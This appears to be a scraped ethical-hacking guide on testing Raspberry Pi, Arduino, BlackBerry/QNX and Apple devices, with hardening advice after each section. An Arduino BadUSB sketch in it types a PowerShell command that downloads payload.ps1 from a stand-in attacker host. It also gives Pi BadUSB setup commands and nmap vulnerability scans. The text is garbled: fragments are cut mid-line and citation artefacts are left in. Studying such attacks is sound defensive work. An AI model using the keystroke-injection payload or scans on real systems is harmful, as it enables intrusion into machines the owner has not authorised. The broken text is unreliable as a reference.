What you can (legally) test on Raspberry Pi, Arduino, BlackBerry, MacBooks & iPhones—and how to do it responsibly.
Ethical hacking (a.k.a. penetration testing or security assessment) is the authorised exploitation of hardware and software to discover and help patch vulnerabilities. Methodologies such as OSSTMM 3 provide structured, objective coverage of physical, social, and digital attack surfaces :contentReference[oaicite:0]{index=0}. Across all platforms, stay within the confines of relevant law—e.g., South Africa’s Cybercrimes Act 19 of 2020 requires explicit permission from the system owner :contentReference[oaicite:1]{index=1}.
NOTE — This guide is educational. Always obtain written consent, set clear scopes, and report findings through responsible-disclosure channels.
Create an isolated test network (VLAN or Wi-Fi AP in monitor mode
) and version-control your findings in encrypted repos.
Follow CEH or PNPT reporting formats for professionalism :contentReference[oaicite:8]{index=8}.
Low-cost SBC with GPIO, an ARM CPU, and broad distro support. Books like “Penetration Testing with Raspberry Pi” detail full red-team kits :contentReference[oaicite:9]{index=9}.
airodump-ng
)+de-auth (aireplay-ng
)
// Flash latest Kali ARM64
sudo rpi-imager
// Enable OTG gadget for BadUSB
echo "dtoverlay=dwc2" | sudo tee -a /boot/config.txt
sudo modprobe libcomposite
Disable unused services; enforce ufw
; place Pi-based sensors behind separate VLANs; monitor outbound DNS logs :contentReference[oaicite:12]{index=12}.
Digispark/Pro Micro
:contentReference[oaicite:14]{index=14}
#include <Keyboard.h>
void setup(){
delay(1000);
Keyboard.print("powershell -c \"Invoke-WebRequest attacker.example/payload.ps1\"");
}
void loop(){}
Lock BIOS/UEFI to forbid USB boot; enforce device control solutions; use physical port blockers when possible :contentReference[oaicite:15]{index=15}.
Modern BlackBerry hardware often runs QNX—also embedded in automotive systems. Recent advisories (e.g., QNX-2024-002) show improper input-validation issues in networking stacks :contentReference[oaicite:16]{index=16}.
nmap -sV
Patch promptly; restrict perimeter network exposure; implement App Policy controls within BlackBerry UEM.
IOKit
)Community research highlights unpatchable side-channel leaks in Apple Silicon that could expose encryption keys if the device is physically seized :contentReference[oaicite:18]{index=18}.
sudo /Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
brew install --cask burpsuite
sudo nmap -p- -sV --script vuln 192.168.0.0/24
Enable Full Security boot policy, FileVault 2, and System Integrity Protection. Disallow unsigned kexts and keep Rapid Security Responses up to date.
Common issues include inadequate ATS/SSL pinning, weak biometric fallback logic, and insecure local file storage—often revealed through live-patch hooks and certificate pinning bypass.
Leverage Apple’s App Attest; enforce NSUserDefaults protection; adopt ASLR-friendly compile flags (-PIE -fstack-protector-strong
).
Follow Rapid7’s weekly Metasploit wrap-ups :contentReference[oaicite:22]{index=22}, EC-Council tool digests :contentReference[oaicite:23]{index=23}, and subscribe to vendor-specific advisories from Apple, BlackBerry, and Raspberry Pi Foundations to stay ahead.